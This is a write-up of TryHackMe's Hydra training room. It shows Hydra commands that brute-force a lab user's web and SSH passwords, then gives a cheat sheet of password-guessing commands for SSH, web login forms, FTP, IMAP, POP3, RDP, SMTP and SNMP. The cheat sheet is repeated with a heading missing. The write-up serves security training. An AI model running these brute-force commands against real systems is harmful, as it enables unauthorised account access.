Hydra-TryHackMe
This write-up is based on TryHackMe's rooms named Hydra.
#1 Use Hydra to brute-force molly's web password. What is flag 1?
Use the following command to brute-force web password:
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.75.16 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
Now login to the webpage http://10.10.75.16/login with the molly's credentials which we just cracked with hydra:
Here we will find our first flag:
#2 Use Hydra to brute-force molly's SSH password. What is flag 2?
Now lets crack molly's SSH password using Hydra:
hydra -s 22 -v -q -l molly -P /usr/share/wordlists/rockyou.txt -e nsr -t 4 -w 5 10.10.75.16 ssh
-s PORT if the service is on a different default port, define it here
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-q do not print messages about connection errors
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
Login to the machine using SSH and using molly's cracked credentials to get flag2.txt:
ssh molly@10.10.75.16
That's all for this room.
Here is the list of various example commands for the most common protocols(modify them according to your needs):
Brute force SSH
=============
⇒ hydra -s 22 -v -q -L user.txt -P /usr/share/wordlists/rockyou.txt -e nsr -t 4 -w 5 10.10.10.10 ssh -V
⇒ hydra -l root -p admin 10.10.10.10 -t 4 ssh
Brute force HTTP POST Form
=======================
⇒ WordPress example:
hydra -l user1 -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&redirect_to=http%3A%2F%2F10.10.10.10%2Fwp-admin%2F&testcookie=1:F=ERROR"
⇒ hydra -l user1 -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect"
⇒ hydra -l user1 -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Brute Force FTP
=============
⇒ hydra -l user -P passlist.txt ftp://10.10.10.10
Brute Force IMAP
==============
⇒ hydra -L userlist.txt -p defaultpw imap://10.10.10.10/PLAIN
Brute Force POP3
==============
⇒ hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
Brute Force RDP
=============
⇒ hydra rdp://10.10.10.10/firstdomainname -l john -p doe
Brute Force SMTP
==============
hydra smtp-enum://10.10.10.10/vrfy -l john -p localhost
Brute Force SNMP
==============
⇒ hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ 10.10.10.10 snmp (SNMP v3)
⇒ hydra -P pass.txt -m 2 10.10.10.10 snmp (SNMP v2)
=============
⇒ hydra -s 22 -v -q -L user.txt -P /usr/share/wordlists/rockyou.txt -e nsr -t 4 -w 5 10.10.10.10 ssh -V
⇒ hydra -l root -p admin 10.10.10.10 -t 4 ssh
Brute force HTTP POST Form
=======================
⇒ WordPress example:
hydra -l user1 -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&redirect_to=http%3A%2F%2F10.10.10.10%2Fwp-admin%2F&testcookie=1:F=ERROR"
⇒ hydra -l user1 -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect"
⇒ hydra -l user1 -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Brute Force FTP
=============
⇒ hydra -l user -P passlist.txt ftp://10.10.10.10
Brute Force IMAP
==============
⇒ hydra -L userlist.txt -p defaultpw imap://10.10.10.10/PLAIN
Brute Force POP3
==============
⇒ hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
Brute Force RDP
=============
⇒ hydra rdp://10.10.10.10/firstdomainname -l john -p doe
Brute Force SMTP
==============
hydra smtp-enum://10.10.10.10/vrfy -l john -p localhost
Brute Force SNMP
==============
⇒ hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ 10.10.10.10 snmp (SNMP v3)
⇒ hydra -P pass.txt -m 2 10.10.10.10 snmp (SNMP v2)
Useful Resources:
Comments
Post a Comment